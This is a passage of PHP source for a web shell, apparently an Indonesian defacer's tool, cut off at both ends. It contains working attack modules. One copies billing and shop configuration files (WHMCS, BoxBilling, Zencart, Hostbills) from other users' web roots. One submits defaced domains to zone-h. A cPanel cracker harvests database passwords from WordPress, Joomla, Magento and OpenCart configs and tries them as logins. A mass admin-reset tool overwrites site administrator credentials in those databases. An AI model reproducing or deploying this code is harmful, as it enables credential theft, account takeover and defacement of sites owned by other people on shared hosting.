"WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/hosting/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/CART/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Cart/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/cart/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/ORDER/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Order/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/order/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/CLIENT/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Client/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/client/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Clientarea/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/clientarea/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/SUPPORT/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Support/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/support/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/BILLING/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Billing/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/billing/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/BUY/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Buy/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/buy/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/MANAGE/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Manage/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/manage/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/ClientSupport/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Clientsupport/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/clientsupport/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/CHECKOUT/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Checkout/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/checkout/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/BILLINGS/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Billings/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/billings/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/BASKET/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Basket/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/basket/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/SECURE/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Secure/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/secure/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/SALES/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Sales/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/sales/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/BILL/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Bill/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/bill/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/PURCHASE/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Purchase/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/purchase/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/ACCOUNT/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Account/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/account/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/USER/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/User/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/user/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/CLIENTS/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Clients/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/clients/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/BILLINGS/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/Billings/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/billings/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/MY/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/My/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/my/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/secure/whm/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/secure/whmcs/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/panel/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/clientes/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/cliente/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/support/order/submitticket.php" => "WHMCS",\n\t\t\t\t\t\t\t"$user_docroot/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/boxbilling/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/box/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/host/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/Host/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/supportes/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/support/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/hosting/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/cart/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/order/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/client/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/clients/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/cliente/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/clientes/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/billing/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/billings/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/my/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/secure/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/support/order/bb-config.php" => "BoxBilling",\n\t\t\t\t\t\t\t"$user_docroot/includes/dist-configure.php" => "Zencart",\n\t\t\t\t\t\t\t"$user_docroot/zencart/includes/dist-configure.php" => "Zencart",\n\t\t\t\t\t\t\t"$user_docroot/products/includes/dist-configure.php" => "Zencart",\n\t\t\t\t\t\t\t"$user_docroot/cart/includes/dist-configure.php" => "Zencart",\n\t\t\t\t\t\t\t"$user_docroot/shop/includes/dist-configure.php" => "Zencart",\n\t\t\t\t\t\t\t"$user_docroot/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/hostbills/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/host/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/Host/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/supportes/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/support/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/hosting/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/cart/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/order/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/client/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/clients/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/cliente/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/clientes/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/billing/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/billings/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/my/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/secure/includes/iso4217.php" => "Hostbills",\n\t\t\t\t\t\t\t"$user_docroot/support/order/includes/iso4217.php" => "Hostbills"\n\n\t\t\t\t\t\t);\n\t\t\t\t\t\tforeach($getconfig as $config => $userconfig) {\n\t\t\t\t\t\t\t$get = file_get_contents($config);\n\t\t\t\t\t\t\tif($get == \'\') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\t$fopen = fopen("lanang_config/$user-$userconfig.txt", "w");\n\t\t\t\t\t\t\t\tfputs($fopen, $get);\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tprint "<div style=\'background: #ffffff; width: 100%; height: 100%\'>";\n\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/lanang_config/\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\tprint "</div>";\n\t\t}\n\t\telseif($_GET[\'do\'] === "zoneh") {\n\t\t\tif(isset($_POST[\'submit\']) AND $_GET[\'do\'] === "zoneh") {\n\t\t\t\t$nick \t= $_POST[\'nick\'];\n\t\t\t\t$domain = explode("\\r\\n", $_POST[\'url\']);\n\n\t\t\t\tprint "Defacer Onhold: <a href=\'http://www.zone-h.org/archive/notifier=$nick/published=0\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";\n\t\t\t\tprint "Defacer Archive: <a href=\'http://www.zone-h.org/archive/notifier=$nick\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";\n\t\n\t\t\t\tforeach($domain as $no => $url) {\n\t\t\t\t\t$no = ($no+1).".";\n\t\t\t\t\t$post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send")[\'response\'];\n\t\t\t\t\tif(preg_match("/color=\\"red\\">OK<\\/font><\\/li>/i", $post)) {\n\t\t\t\t\t\tprint "$no $url -> ".color(1, 2, "OK")."<br>";\n\t\t\t\t\t} else {\n\t\t\t\t\t\tprint "$no $url -> ".color(1, 1, "ERROR")."<br>";\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\telse {\n\t\t\t\tprint "<center><form method=\'post\' action=\'?do=zoneh&dir=".path()."\'>\n\t\t \t Defacer: <br>\n\t\t \t <input type=\'text\' name=\'nick\' size=\'50\' value=\'L4N4N9_4K1R4\'><br><br>\n\t\t \t Domains: <br>\n\t\t \t <textarea style=\'width: 450px; height: 150px;\' name=\'url\' placeholder=\'http://google.com/\'></textarea><br>\n\t\t \t <input style=\'background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;\' type=\'submit\' name=\'submit\' value=\'Submit\'>\n\t\t \t </form></center>";\n\t\t \t}\n\t\t}\n\t\telseif($_GET[\'do\'] == \'cpanel\') {\n\t\t\tif($_POST[\'crack\']) {\n\t\t\t\t$usercp = explode("\\r\\n", $_POST[\'user_cp\']);\n\t\t\t\t$passcp = explode("\\r\\n", $_POST[\'pass_cp\']);\n\t\t\t\t$i = 0;\n\t\t\t\tforeach($usercp as $ucp) {\n\t\t\t\t\tforeach($passcp as $pcp) {\n\t\t\t\t\t\t$connect = mysql_connect(\'localhost\', $ucp, $pcp);\n\t\t\t\t\t\tif($connect) {\n\t\t\t\t\t\t\tif($_SESSION[$ucp] && $_SESSION[$pcp]) {\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t$_SESSION[$ucp] = "1";\n\t\t\t\t\t\t\t\t$_SESSION[$pcp] = "1";\n\t\t\t\t\t\t\t\tif($ucp === \'\' || $pcp === \'\') {\n\t\t\t\t\t\t\t\t\t// \n\t\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t\t$i++;\n\t\t\t\t\t\t\t\t\tprint "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";\n\t\t\t\t\t\t\t\t\tif(!function_exists(\'posix_getpwuid\')) print color(1, 1, "Function is Disable by System!");\n\t\t\t\t\t\t\t\t\tif(!getdomainname()) print color(1, 1, "Can\'t get domain name");\n\t\t\t\t\t\t\t\t\tforeach(getdomainname() as $domain) {\n\t\t\t\t\t\t\t\t\t\t$userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));\n\t\t\t\t\t\t\t\t\t\t$userdomain = $userdomain->name;\n\t\t\t\t\t\t\t\t\t\tif($userdomain === $user) {\n\t\t\t\t\t\t\t\t\t\t\tprint "<a href=\'http://$domain/\' target=\'_blank\'>".color(1, 2, $domain)."</a><br>";\n\t\t\t\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\tprint (empty($domain)) ? color(1, 1, "Can\'t get domain name.") : color(1, 2, $domain);\n\t\t\t\t\t\t\t\t\tprint ")<br>";\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tmysql_close($connect);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tprint ($i === 0) ? "" : "<p>".color(1, 3, "Sukses nyolong $i Cpanel by L4N4N9_4K1R4")."</p>";\n\t\t\t} else {\n\t\t\t\tprint "<center>\n\t\t\t\t\t <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>\n\t\t\t\t\t <form method=\'post\'>\n\t\t\t\t\t USER: <br>\n\t\t\t\t\t <textarea style=\'width: 450px; height: 150px;\' name=\'user_cp\'>";\n\t\t\t\tprint implode("\\n", getuser());\n\t\t\t\tprint "</textarea><br>\n\t\t\t\t\t PASS: <br>\n\t\t\t\t\t <input style=\'background: transparent; border: 1px solid #ffffff; color: #ffffff;\' type=\'text\' name=\'linkpass\' placeholder=\'Grab Password from Link Config\'>\n\t\t\t\t\t <input style=\'background: transparent; border: 1px solid #ffffff; color: #ffffff;\' type=\'submit\' name=\'submitlink\' value=\'>>\'>\n\t\t\t\t\t <br>\n\t\t\t\t\t <textarea style=\'width: 450px; height: 200px;\' name=\'pass_cp\'>";\n\n\t\t\t\tif(isset($_POST[\'submitlink\'])) {\n\t\t\t\t\t$getpass = $_POST[\'linkpass\'];\n\t\t\t\t\t$get = curl($_POST[\'linkpass\'])[\'response\'];\n\t\t\t\t\tpreg_match_all(\'/<a href="(.*?).txt">/\', $get, $link);\n\t\t\t\t\tforeach($link[1] as $link_config) {\n\t\t\t\t\t\t$scandir[] = "$link_config.txt";\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\t$getpass = path();\n\t\t\t\t\t$scandir = scandir($getpass);\n\t\t\t\t}\n\n\t\t\t\t$password = "";\n\n\t\t\t\tforeach($scandir as $files) {\n\t\t\t\t\t$file = "$getpass/$files";\n\t\t\t\t\t$config = file_get_contents($file);\n\t\t\t\t\tif(preg_match("/WordPress/", $config)) {\n\t\t\t\t\t\t$password .= getValue($config, "DB_PASSWORD\', \'", "\'")."\\n";\n\t\t\t\t\t} \n\t\t\t\t\telseif(preg_match("/JConfig|joomla/", $config)) {\n\t\t\t\t\t\t$password .= getValue($config, "password = \'", "\'")."\\n";\n\t\t\t\t\t} \n\t\t\t\t\telseif(preg_match("/Magento|Mage_Core/", $config)) {\n\t\t\t\t\t\t$password .= getValue($config, "<password><![CDATA[", "]]></password>")."\\n";\n\t\t\t\t\t} \n\t\t\t\t\telseif(preg_match("/panggil fungsi validasi xss dan injection/", $config)) {\n\t\t\t\t\t\t$password .= getValue($config, \'password = "\', \'"\')."\\n";\n\t\t\t\t\t} \n\t\t\t\t\telseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {\n\t\t\t\t\t\t$password .= getValue($config, "\'DB_PASSWORD\', \'", "\'")."\\n";\n\t\t\t\t\t} \n\t\t\t\t\telseif(preg_match("/^[client]$/", $config)) {\n\t\t\t\t\t\tpreg_match("/password=(.*?)/", $config, $pass);\n\t\t\t\t\t\tif(preg_match(\'/"/\', $pass[1])) {\n\t\t\t\t\t\t\t$pass[1] = str_replace(\'"\', "", $pass[1]);\n\t\t\t\t\t\t\t$password .= $pass[1]."\\n";\n\t\t\t\t\t\t} \n\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t$password .= $pass[1]."\\n";\n\t\t\t\t\t\t}\n\t\t\t\t\t} \n\t\t\t\t\telseif(preg_match("/cc_encryption_hash/", $config)) {\n\t\t\t\t\t\t$password .= getValue($config, "db_password = \'", "\'")."\\n";\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tprint $password;\n\n\t\t\t\tprint "</textarea><br>\n\t\t\t\t\t <input style=\'background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;\' type=\'submit\' name=\'crack\' value=\'Crack\'>\n\t\t\t\t\t </form></center>";\n\t\t\t}\n\t\t}\n\t\telseif($_GET[\'do\'] == \'mpc\') {\n\t\t\tif($_POST[\'hajar\']) {\n\t\t\t\tif(strlen($_POST[\'pass_baru\']) < 6 OR strlen($_POST[\'user_baru\']) < 6) {\n\t\t\t\t\tprint "username atau password harus lebih dari 6 karakter";\n\t\t\t\t} \n\t\t\t\telse {\n\t\t\t\t\t$user_baru = $_POST[\'user_baru\'];\n\t\t\t\t\t$pass_baru = md5($_POST[\'pass_baru\']);\n\t\t\t\t\t$conf = $_POST[\'config_dir\'];\n\n\t\t\t\t\tif(preg_match("/^http:\\/\\//", $conf) OR preg_match("/^https:\\/\\//", $conf)) {\n\t\t\t\t\t\t$get = curl($conf)[\'response\'];\n\t\t\t\t\t\tpreg_match_all(\'/<a href="(.*?).txt">/\', $get, $link);\n\t\t\t\t\t\tforeach($link[1] as $link_config) {\n\t\t\t\t\t\t\t$scan_conf[] = "$link_config.txt";\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\t$scan_conf = scandir($conf);\n\t\t\t\t\t}\n\n\t\t\t\t\tforeach($scan_conf as $file_conf) {\n\t\t\t\t\t\t$config = file_get_contents("$conf/$file_conf");\n\t\t\t\t\t\tif(preg_match("/JConfig|joomla/",$config)) {\n\t\t\t\t\t\t\t$dbhost = getValue($config,"host = \'","\'");\n\t\t\t\t\t\t\t$dbuser = getValue($config,"user = \'","\'");\n\t\t\t\t\t\t\t$dbpass = getValue($config,"password = \'","\'");\n\t\t\t\t\t\t\t$dbname = getValue($config,"db = \'","\'");\n\t\t\t\t\t\t\t$dbprefix = getValue($config,"dbprefix = \'","\'");\n\t\t\t\t\t\t\t$prefix = $dbprefix."users";\n\t\t\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\n\t\t\t\t\t\t\t$db = mysql_select_db($dbname);\n\t\t\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\n\t\t\t\t\t\t\t$result = mysql_fetch_array($q);\n\t\t\t\t\t\t\t$id = $result[\'id\'];\n\t\t\t\t\t\t\t$site = getValue($config,"sitename = \'","\'");\n\t\t\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE id=\'$id\'");\n\t\t\t\t\t\t\tprint "Config => ".$file_conf."<br>";\n\t\t\t\t\t\t\tprint "CMS => Joomla<br>";\n\t\t\t\t\t\t\tif($site == \'\') {\n\t\t\t\t\t\t\t\tprint "Sitename => ".color(1, 1, "Can\'t get domain name")."<br>";\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\tprint "Sitename => $site<br>";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif(!$update OR !$conn OR !$db) {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 1, mysql_error())."<br><br>";\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tmysql_close($conn);\n\t\t\t\t\t\t} elseif(preg_match("/WordPress/",$config)) {\n\t\t\t\t\t\t\t$dbhost = getValue($config,"DB_HOST\', \'","\'");\n\t\t\t\t\t\t\t$dbuser = getValue($config,"DB_USER\', \'","\'");\n\t\t\t\t\t\t\t$dbpass = getValue($config,"DB_PASSWORD\', \'","\'");\n\t\t\t\t\t\t\t$dbname = getValue($config,"DB_NAME\', \'","\'");\n\t\t\t\t\t\t\t$dbprefix = getValue($config,"table_prefix = \'","\'");\n\t\t\t\t\t\t\t$prefix = $dbprefix."users";\n\t\t\t\t\t\t\t$option = $dbprefix."options";\n\t\t\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\n\t\t\t\t\t\t\t$db = mysql_select_db($dbname);\n\t\t\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\n\t\t\t\t\t\t\t$result = mysql_fetch_array($q);\n\t\t\t\t\t\t\t$id = $result[ID];\n\t\t\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\n\t\t\t\t\t\t\t$result2 = mysql_fetch_array($q2);\n\t\t\t\t\t\t\t$target = $result2[option_value];\n\t\t\t\t\t\t\tif($target == \'\') {\n\t\t\t\t\t\t\t\t$url_target = "Login => ".color(1, 1, "Cant\'t get domain name")."<br>";\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/wp-login.php\' target=\'_blank\'><u>$target/wp-login.php</u></a><br>";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user_baru\',user_pass=\'$pass_baru\' WHERE id=\'$id\'");\n\t\t\t\t\t\t\tprint "Config => ".$file_conf."<br>";\n\t\t\t\t\t\t\tprint "CMS => Wordpress<br>";\n\t\t\t\t\t\t\tprint $url_target;\n\t\t\t\t\t\t\tif(!$update OR !$conn OR !$db) {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 1, mysql_error())."<br><br>";\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tmysql_close($conn);\n\t\t\t\t\t\t} \n\t\t\t\t\t\telseif(preg_match("/Magento|Mage_Core/",$config)) {\n\t\t\t\t\t\t\t$dbhost = getValue($config,"<host><![CDATA[","]]></host>");\n\t\t\t\t\t\t\t$dbuser = getValue($config,"<username><![CDATA[","]]></username>");\n\t\t\t\t\t\t\t$dbpass = getValue($config,"<password><![CDATA[","]]></password>");\n\t\t\t\t\t\t\t$dbname = getValue($config,"<dbname><![CDATA[","]]></dbname>");\n\t\t\t\t\t\t\t$dbprefix = getValue($config,"<table_prefix><![CDATA[","]]></table_prefix>");\n\t\t\t\t\t\t\t$prefix = $dbprefix."admin_user";\n\t\t\t\t\t\t\t$option = $dbprefix."core_config_data";\n\t\t\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\n\t\t\t\t\t\t\t$db = mysql_select_db($dbname);\n\t\t\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\n\t\t\t\t\t\t\t$result = mysql_fetch_array($q);\n\t\t\t\t\t\t\t$id = $result[user_id];\n\t\t\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option WHERE path=\'web/secure/base_url\'");\n\t\t\t\t\t\t\t$result2 = mysql_fetch_array($q2);\n\t\t\t\t\t\t\t$target = $result2[value];\n\t\t\t\t\t\t\tif($target == \'\') {\n\t\t\t\t\t\t\t\t$url_target = "Login => ".color(1, 1, "Cant\'t get domain name")."<br>";\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/admin/\' target=\'_blank\'><u>$target/admin/</u></a><br>";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\n\t\t\t\t\t\t\tprint "Config => ".$file_conf."<br>";\n\t\t\t\t\t\t\tprint "CMS => Magento<br>";\n\t\t\t\t\t\t\tprint $url_target;\n\t\t\t\t\t\t\tif(!$update OR !$conn OR !$db) {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 1, mysql_error())."<br><br>";\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tmysql_close($conn);\n\t\t\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {\n\t\t\t\t\t\t\t$dbhost = getValue($config,"\'DB_HOSTNAME\', \'","\'");\n\t\t\t\t\t\t\t$dbuser = getValue($config,"\'DB_USERNAME\', \'","\'");\n\t\t\t\t\t\t\t$dbpass = getValue($config,"\'DB_PASSWORD\', \'","\'");\n\t\t\t\t\t\t\t$dbname = getValue($config,"\'DB_DATABASE\', \'","\'");\n\t\t\t\t\t\t\t$dbprefix = getValue($config,"\'DB_PREFIX\', \'","\'");\n\t\t\t\t\t\t\t$prefix = $dbprefix."user";\n\t\t\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\n\t\t\t\t\t\t\t$db = mysql_select_db($dbname);\n\t\t\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\n\t\t\t\t\t\t\t$result = mysql_fetch_array($q);\n\t\t\t\t\t\t\t$id = $result[user_id];\n\t\t\t\t\t\t\t$target = getValue($config,"HTTP_SERVER\', \'","\'");\n\t\t\t\t\t\t\tif($target == \'\') {\n\t\t\t\t\t\t\t\t$url_target = "Login => ".color(1, 1, "Cant\'t get domain name")."<br>";\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target\' target=\'_blank\'><u>$target</u></a><br>";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\n\t\t\t\t\t\t\tprint "Config => ".$file_conf."<br>";\n\t\t\t\t\t\t\tprint "CMS => OpenCart<br>";\n\t\t\t\t\t\t\tprint $url_target;\n\t\t\t\t\t\t\tif(!$update OR !$conn OR !$db) {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 1, mysql_error())."<br><br>";\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tmysql_close($conn);\n\t\t\t\t\t\t} \n\t\t\t\t\t\telseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {\n\t\t\t\t\t\t\t$dbhost = getValue($config,\'server = "\',\'"\');\n\t\t\t\t\t\t\t$dbuser = getValue($config,\'username = "\',\'"\');\n\t\t\t\t\t\t\t$dbpass = getValue($config,\'password = "\',\'"\');\n\t\t\t\t\t\t\t$dbname = getValue($config,\'database = "\',\'"\');\n\t\t\t\t\t\t\t$prefix = "users";\n\t\t\t\t\t\t\t$option = "identitas";\n\t\t\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\n\t\t\t\t\t\t\t$db = mysql_select_db($dbname);\n\t\t\t\t\t\t\t$q = mysql_query("SELECT * FROM $option ORDER 